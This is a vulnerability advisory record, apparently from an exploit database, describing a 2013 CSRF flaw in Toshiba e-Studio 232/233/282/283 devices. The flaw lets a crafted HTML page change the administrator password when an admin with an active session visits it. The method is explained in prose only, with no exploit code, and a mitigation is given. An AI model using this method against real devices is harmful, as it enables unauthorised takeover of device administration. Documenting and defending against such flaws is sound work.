Vendor: e-Studio 232/233/282/283
By: Hubert Gradek
CVSS: 7.8 (HIGH)
CWE: 352 (CSRF)
Product Name: e-Studio 232/233/282/283
Affected Version From: T377SY0EXXX
Affected Version To: T377SY0EXXX
Patch Exists: No
Related CWE: None
CPE: TOSHIBA e-Studio 232/233/282/283
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: TOSHIBA e-Studio 232 (T377SY0E354) / 233 (T377SY0E331)
Year: 2013
Title: TOSHIBA e-Studio 232/233/282/283 Change Admin Password CSRF Vulnerability
A CSRF vulnerability exists in TOSHIBA e-Studio 232/233/282/283 that allows an attacker to change the administrator password. Exploitation requires the attacker to craft a malicious HTML page which, when visited by an administrator with an active session on the device, submits a POST request to the vulnerable device containing the new password. The password must be at least 6 digits long.
Mitigation:
Implement CSRF protection on the vulnerable device, and ensure that the admin password is strong enough to resist brute-force attacks.